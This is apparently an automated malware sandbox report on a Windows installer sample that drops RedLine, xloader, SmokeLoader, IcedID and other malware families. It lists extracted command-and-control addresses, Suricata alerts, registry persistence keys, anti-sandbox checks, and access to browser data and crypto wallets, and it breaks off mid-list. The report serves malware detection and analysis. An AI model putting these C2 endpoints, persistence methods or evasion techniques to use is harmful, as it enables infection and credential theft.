Resubmissions
02-11-2021 06:54
211102-hpn1zsbhc2 1002-11-2021 06:42
211102-hgpmjsgggp 1001-11-2021 21:47
211101-1ncknsfgfm 10Analysis
-
max time kernel
7572s -
max time network
28885s -
platform
windows11_x64 -
resource
win11 -
submitted
01-11-2021 21:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
b5b5fe52ed9ca7d47bfb857498fd684c
-
SHA1
9c17089a630141c9b4e13ef46ab334d46709fdb8
-
SHA256
6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b
-
SHA512
482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a
Malware Config
Extracted
redline
newjust
135.181.129.119:4805
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Extracted
smokeloader
2020
http://honawey70.top/
http://wijibui00.top/
Extracted
icedid
3038794475
Signatures
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3592 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5416 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6616 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5496 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6024 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2944 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8016 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2228 4792 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/4832-309-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/4832-310-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17870faab0.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17870faab0.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 50 IoCs
Processes:
installer.exeWerFault.exeWerFault.exeWerFault.exe6F64.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe4112.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeCalculator.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 3236 created 1240 3236 installer.exe WerFault.exe PID 1300 created 5544 1300 WerFault.exe chrome.exe PID 5880 created 4040 5880 WerFault.exe Conhost.exe PID 6640 created 5796 6640 WerFault.exe FMTnjSf044j05Xl8dMd_dNnh.exe PID 6776 created 5672 6776 6F64.exe GUJG8vfRqogim7xN2gxq4qxO.exe PID 2180 created 1460 2180 WerFault.exe Mon17a0d8ec302e.exe PID 6384 created 3160 6384 WerFault.exe Mon17bffc2992eb3d.exe PID 6596 created 932 6596 cmd.exe WerFault.exe PID 2084 created 6372 2084 WerFault.exe chrome3.exe PID 6308 created 4856 6308 WerFault.exe rundll32.exe PID 5064 created 5592 5064 WerFault.exe ABB3.exe PID 1900 created 5148 1900 WerFault.exe Soft1WW01.exe PID 1904 created 3412 1904 WerFault.exe JmrC_y7ZqnosVrDZc7UTR80C.exe PID 6304 created 6032 6304 WerFault.exe JmrC_y7ZqnosVrDZc7UTR80C.exe PID 4964 created 5708 4964 4112.exe services64.exe PID 5344 created 5688 5344 WerFault.exe svchost.exe PID 4652 created 5980 4652 WerFault.exe Conhost.exe PID 5772 created 400 5772 WerFault.exe neCuj2trzULeCoH07fFT9rBD.exe PID 932 created 5828 932 WerFault.exe 1uT2d0BkeE_DJquEcpjI45YJ.exe PID 5376 created 5788 5376 WerFault.exe f_qhca_mqGIJHx39G3hKWVKQ.exe PID 1364 created 1816 1364 WerFault.exe 0fFanJEm3W2BLsRLXOPRYqYY.exe PID 1048 created 5592 1048 WerFault.exe ABB3.exe PID 1084 created 5656 1084 WerFault.exe bwkxPh1yL2Wkm1rmvTMe2VTO.exe PID 5784 created 4680 5784 WerFault.exe neCuj2trzULeCoH07fFT9rBD.exe PID 7000 created 6552 7000 WerFault.exe XOi6C0Ymdh5PqNsTC3JWe2Yq.exe PID 916 created 2664 916 WerFault.exe XkYUSm_BYC_RZqlw0pSLKPVp.exe PID 6324 created 1180 6324 WerFault.exe rundll32.exe PID 4616 created 2440 4616 WerFault.exe 16A5.exe PID 5136 created 7084 5136 WerFault.exe 2DA8.exe PID 6084 created 5768 6084 UlBX2Ub5Zbv6MawSefADY4uU.exe PID 1484 created 5968 1484 WerFault.exe beadroll.exe PID 1556 created 236 1556 WerFault.exe rundll32.exe PID 6224 created 6192 6224 Calculator.exe 71F8.exe PID 6100 created 5012 6100 WerFault.exe UlBX2Ub5Zbv6MawSefADY4uU.exe PID 5772 created 6964 5772 WerFault.exe FFEF.exe PID 2148 created 4048 2148 WerFault.exe 5D56.exe PID 3784 created 6152 3784 rundll32.exe PID 7172 created 10092 7172 WerFault.exe GcleanerEU.exe PID 7380 created 6264 7380 WerFault.exe gcleaner.exe PID 9256 created 6488 9256 WerFault.exe tkools.exe PID 9912 created 5532 9912 WerFault.exe GcleanerEU.exe PID 1116 created 10180 1116 WerFault.exe rundll32.exe PID 2920 created 8384 2920 WerFault.exe gcleaner.exe PID 8588 created 5492 8588 WerFault.exe autosubplayer.exe PID 6664 created 6456 6664 WerFault.exe GcleanerEU.exe PID 9024 created 8220 9024 WerFault.exe rundll32.exe PID 8952 created 9096 8952 WerFault.exe gcleaner.exe PID 10224 created 4896 10224 WerFault.exe GcleanerEU.exe PID 1688 created 7116 1688 WerFault.exe rundll32.exe PID 8264 created 6272 8264 WerFault.exe gcleaner.exe -
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/1756-564-0x0000000002C00000-0x0000000002C29000-memory.dmp xloader behavioral4/memory/6848-620-0x0000000002CC0000-0x0000000002CE9000-memory.dmp xloader -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\libcurl.dll aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
msiexec.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\NTCTUVXP-27 = "C:\\Program Files (x86)\\Ent5pjl6\\configbdzhzl.exe" msiexec.exe -
Blocklisted process makes network request 64 IoCs
Processes:
MsiExec.exemsiexec.exeflow pid process 555 5824 MsiExec.exe 559 5824 MsiExec.exe 561 5824 MsiExec.exe 563 5824 MsiExec.exe 564 5824 MsiExec.exe 565 5824 MsiExec.exe 567 5824 MsiExec.exe 569 5824 MsiExec.exe 574 5824 MsiExec.exe 575 5824 MsiExec.exe 577 5824 MsiExec.exe 578 5824 MsiExec.exe 581 5824 MsiExec.exe 582 5824 MsiExec.exe 584 5824 MsiExec.exe 585 5824 MsiExec.exe 587 5824 MsiExec.exe 589 5824 MsiExec.exe 590 5824 MsiExec.exe 591 5824 MsiExec.exe 593 5824 MsiExec.exe 594 5824 MsiExec.exe 596 5824 MsiExec.exe 598 5824 MsiExec.exe 599 5824 MsiExec.exe 600 5824 MsiExec.exe 605 5824 MsiExec.exe 611 5824 MsiExec.exe 612 5824 MsiExec.exe 613 5824 MsiExec.exe 615 5824 MsiExec.exe 616 1756 msiexec.exe 617 5824 MsiExec.exe 619 5824 MsiExec.exe 620 5824 MsiExec.exe 621 5824 MsiExec.exe 622 5824 MsiExec.exe 623 5824 MsiExec.exe 625 5824 MsiExec.exe 626 5824 MsiExec.exe 627 5824 MsiExec.exe 819 1756 msiexec.exe 939 1756 msiexec.exe 1106 1756 msiexec.exe 1309 1756 msiexec.exe 1462 1756 msiexec.exe 1760 1756 msiexec.exe 1842 1756 msiexec.exe 1896 1756 msiexec.exe 1976 1756 msiexec.exe 2048 1756 msiexec.exe 2066 1756 msiexec.exe 2107 1756 msiexec.exe 2116 1756 msiexec.exe 2272 1756 msiexec.exe 2289 1756 msiexec.exe 2297 1756 msiexec.exe 2297 1756 msiexec.exe 2420 1756 msiexec.exe 2440 1756 msiexec.exe 2545 1756 msiexec.exe 3318 1756 msiexec.exe 3512 1756 msiexec.exe 3532 1756 msiexec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
Processes:
DYbALA.exeDYbALA.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\System32\drivers\SETF61C.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETF61C.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeMon178e7a516181.exeMon17870faab0.exeMon1708beae021a5ff.exeMon174a6c5f1664f.exeMon179f74c0ff3cf1f.exeMon178d8e5d06822.exeMon17bffc2992eb3d.exeMon17a0d8ec302e.exeMon17afe24e0084db3.exeMon1727c156c4abcec.exeMon173a360b525.exeMon17332e41e6b.exeMon175e6c8b40064b8c8.exeMon17bbf11fdb575d.exeMon17bbf11fdb575d.tmpMon17bbf11fdb575d.exeMon17afe24e0084db3.exeMon17bbf11fdb575d.tmpcmd.exeMon1727c156c4abcec.exeMon174a6c5f1664f.exejc291e2_rKmoNAGsejPpE0Eu.exejc291e2_rKmoNAGsejPpE0Eu.exe3354555.exeMon174a6c5f1664f.exeDownFlSetup110.exe6jZhRtW.EXeinst1.exe238072.exeMon174a6c5f1664f.exeSoft1WW01.exechrome.exe_sJy72r15Io8hjMOpXHU3ng5.exeABB3.exeConhost.exeConhost.exebwkxPh1yL2Wkm1rmvTMe2VTO.exe_6or44rEubg9iZ3VdoaC4XXg.exeiYGd7u5Uk_Ib_3Gb94q_cYxs.exeGUJG8vfRqogim7xN2gxq4qxO.exeyOj1WECF7HJNMLcwMO9spdy6.exeMon174a6c5f1664f.exepostback.exe8326766.exef_qhca_mqGIJHx39G3hKWVKQ.exeFMTnjSf044j05Xl8dMd_dNnh.exeLsXhmWcRgskvDtebvUlqF8rc.exehkAZQUdE7y720uA2jdtj5skU.exeq2NUgOj7NxZeJYYXzRNGaWUt.exeConhost.exe1uT2d0BkeE_DJquEcpjI45YJ.exe75X59NlosCHoajTjpeDlodY1.exe75X59NlosCHoajTjpeDlodY1.exeGav9xdYNZl8Zb_Q49AqR0WeW.exeXOi6C0Ymdh5PqNsTC3JWe2Yq.exeJmrC_y7ZqnosVrDZc7UTR80C.exeadF6KxjhcOfjYh4ost48IawU.exeE_OHOPUQK1p49G7oDJQPE6PW.exeJmrC_y7ZqnosVrDZc7UTR80C.exeQFWlN69O9FNkcWfwdW6z88Ve.exechrome2.exe3515439.exepid process 1692 setup_installer.exe 2488 setup_install.exe 3176 Mon178e7a516181.exe 4040 Mon17870faab0.exe 3788 Mon1708beae021a5ff.exe 1596 Mon174a6c5f1664f.exe 4376 Mon179f74c0ff3cf1f.exe 1260 Mon178d8e5d06822.exe 3160 Mon17bffc2992eb3d.exe 1460 Mon17a0d8ec302e.exe 4824 Mon17afe24e0084db3.exe 3216 Mon1727c156c4abcec.exe 932 Mon173a360b525.exe 720 Mon17332e41e6b.exe 1320 Mon175e6c8b40064b8c8.exe 5088 Mon17bbf11fdb575d.exe 2236 Mon17bbf11fdb575d.tmp 1980 Mon17bbf11fdb575d.exe 3600 Mon17afe24e0084db3.exe 2148 Mon17bbf11fdb575d.tmp 572 cmd.exe 4832 Mon1727c156c4abcec.exe 2844 Mon174a6c5f1664f.exe 2784 jc291e2_rKmoNAGsejPpE0Eu.exe 1732 jc291e2_rKmoNAGsejPpE0Eu.exe 4276 3354555.exe 2264 Mon174a6c5f1664f.exe 4788 DownFlSetup110.exe 4436 6jZhRtW.EXe 3260 inst1.exe 1692 238072.exe 408 Mon174a6c5f1664f.exe 5148 Soft1WW01.exe 5544 chrome.exe 5580 _sJy72r15Io8hjMOpXHU3ng5.exe 5592 ABB3.exe 5688 Conhost.exe 5700 Conhost.exe 5656 bwkxPh1yL2Wkm1rmvTMe2VTO.exe 5724 _6or44rEubg9iZ3VdoaC4XXg.exe 5680 iYGd7u5Uk_Ib_3Gb94q_cYxs.exe 5672 GUJG8vfRqogim7xN2gxq4qxO.exe 5660 yOj1WECF7HJNMLcwMO9spdy6.exe 5164 Mon174a6c5f1664f.exe 5572 postback.exe 5556 8326766.exe 5788 f_qhca_mqGIJHx39G3hKWVKQ.exe 5796 FMTnjSf044j05Xl8dMd_dNnh.exe 5804 LsXhmWcRgskvDtebvUlqF8rc.exe 5812 hkAZQUdE7y720uA2jdtj5skU.exe 5820 q2NUgOj7NxZeJYYXzRNGaWUt.exe 5836 Conhost.exe 5828 1uT2d0BkeE_DJquEcpjI45YJ.exe 5848 75X59NlosCHoajTjpeDlodY1.exe 5860 75X59NlosCHoajTjpeDlodY1.exe 5980 Gav9xdYNZl8Zb_Q49AqR0WeW.exe 6040 XOi6C0Ymdh5PqNsTC3JWe2Yq.exe 6032 JmrC_y7ZqnosVrDZc7UTR80C.exe 6064 adF6KxjhcOfjYh4ost48IawU.exe 6140 E_OHOPUQK1p49G7oDJQPE6PW.exe 3412 JmrC_y7ZqnosVrDZc7UTR80C.exe 5156 QFWlN69O9FNkcWfwdW6z88Ve.exe 5276 chrome2.exe 5752 3515439.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
75X59NlosCHoajTjpeDlodY1.exeq2NUgOj7NxZeJYYXzRNGaWUt.exesihost64.exeFMTnjSf044j05Xl8dMd_dNnh.exe8326766.exebwkxPh1yL2Wkm1rmvTMe2VTO.exe75X59NlosCHoajTjpeDlodY1.exe16A5.exeiYGd7u5Uk_Ib_3Gb94q_cYxs.exe3518046.exe238072.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 75X59NlosCHoajTjpeDlodY1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion q2NUgOj7NxZeJYYXzRNGaWUt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sihost64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FMTnjSf044j05Xl8dMd_dNnh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8326766.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bwkxPh1yL2Wkm1rmvTMe2VTO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bwkxPh1yL2Wkm1rmvTMe2VTO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8326766.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 75X59NlosCHoajTjpeDlodY1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sihost64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 16A5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion iYGd7u5Uk_Ib_3Gb94q_cYxs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 75X59NlosCHoajTjpeDlodY1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3518046.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3518046.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 75X59NlosCHoajTjpeDlodY1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion q2NUgOj7NxZeJYYXzRNGaWUt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 16A5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 238072.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 238072.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FMTnjSf044j05Xl8dMd_dNnh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion iYGd7u5Uk_Ib_3Gb94q_cYxs.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeMon17bbf11fdb575d.tmpMon17bbf11fdb575d.tmpWerFault.exeConhost.exeCalculator Installation.exerundll32.exeregsvr32.exesetup.exehkAZQUdE7y720uA2jdtj5skU.exeWBqf1wfQKQCPMmZBP5wnAft8.tmpConhost.exehkAZQUdE7y720uA2jdtj5skU.exesetup.exeWBqf1wfQKQCPMmZBP5wnAft8.tmprundll32.exesetup.exemsiexec.exemsiexec.exeConhost.exerundll32.exeinstaller.exeautosubplayer.exerundll32.exeMsiExec.exeCalculator.exeCalculator.exepid process 2488 setup_install.exe 2488 setup_install.exe 2488 setup_install.exe 2488 setup_install.exe 2488 setup_install.exe 2488 setup_install.exe 2488 setup_install.exe 2488 setup_install.exe 2236 Mon17bbf11fdb575d.tmp 2148 Mon17bbf11fdb575d.tmp 1240 WerFault.exe 5952 Conhost.exe 5952 Conhost.exe 1468 Calculator Installation.exe 1468 Calculator Installation.exe 1468 Calculator Installation.exe 1468 Calculator Installation.exe 1468 Calculator Installation.exe 5952 Conhost.exe 4856 rundll32.exe 5364 regsvr32.exe 5952 Conhost.exe 5952 Conhost.exe 5360 setup.exe 5360 setup.exe 1368 hkAZQUdE7y720uA2jdtj5skU.exe 1368 hkAZQUdE7y720uA2jdtj5skU.exe 1176 WBqf1wfQKQCPMmZBP5wnAft8.tmp 1368 hkAZQUdE7y720uA2jdtj5skU.exe 6600 Conhost.exe 1368 hkAZQUdE7y720uA2jdtj5skU.exe 1368 hkAZQUdE7y720uA2jdtj5skU.exe 5812 hkAZQUdE7y720uA2jdtj5skU.exe 5812 hkAZQUdE7y720uA2jdtj5skU.exe 2992 setup.exe 2992 setup.exe 5500 WBqf1wfQKQCPMmZBP5wnAft8.tmp 5812 hkAZQUdE7y720uA2jdtj5skU.exe 5812 hkAZQUdE7y720uA2jdtj5skU.exe 5812 hkAZQUdE7y720uA2jdtj5skU.exe 1180 rundll32.exe 6112 setup.exe 6112 setup.exe 7100 msiexec.exe 7100 msiexec.exe 3372 msiexec.exe 3372 msiexec.exe 1336 Conhost.exe 236 rundll32.exe 3236 installer.exe 3236 installer.exe 5328 autosubplayer.exe 5328 autosubplayer.exe 3236 installer.exe 6152 rundll32.exe 2636 MsiExec.exe 2636 MsiExec.exe 5360 setup.exe 5360 setup.exe 8048 Calculator.exe 2992 setup.exe 5360 setup.exe 2992 setup.exe 8576 Calculator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
Processes:
1702062.exeDYbALA.exesetup.exesetup.exeaipackagechainer.exeSettings%20Installation.exesetup.exemsedge.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1702062.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Lyhuvaezhetu.exe\"" DYbALA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Settings = "C:\\Users\\Admin\\AppData\\Roaming\\Settings\\Settings.exe --ZgwMku75" Settings%20Installation.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Settings%20Installation.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
238072.exe75X59NlosCHoajTjpeDlodY1.exeq2NUgOj7NxZeJYYXzRNGaWUt.exejg1_1faf.exesihost64.exe16A5.exeFMTnjSf044j05Xl8dMd_dNnh.exeiYGd7u5Uk_Ib_3Gb94q_cYxs.exe75X59NlosCHoajTjpeDlodY1.exe8326766.exebwkxPh1yL2Wkm1rmvTMe2VTO.exe3518046.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 238072.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 75X59NlosCHoajTjpeDlodY1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA q2NUgOj7NxZeJYYXzRNGaWUt.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sihost64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 16A5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FMTnjSf044j05Xl8dMd_dNnh.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iYGd7u5Uk_Ib_3Gb94q_cYxs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 75X59NlosCHoajTjpeDlodY1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8326766.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bwkxPh1yL2Wkm1rmvTMe2VTO.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3518046.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
setting.exeinstaller.exemsiexec.exemsiexec.exeinstaller.exemsiexec.exeWerFault.exedescription ioc process File opened (read-only) \??\H: setting.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: setting.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\U: setting.exe File opened (read-only) \??\W: setting.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) 